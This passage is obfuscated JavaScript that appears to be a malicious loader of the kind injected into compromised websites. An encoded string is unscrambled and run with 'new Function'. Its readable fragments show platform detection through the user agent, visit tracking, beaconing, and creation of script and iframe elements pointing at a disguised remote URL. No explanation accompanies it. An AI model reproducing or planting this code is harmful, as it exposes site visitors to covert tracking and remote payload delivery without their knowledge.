Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();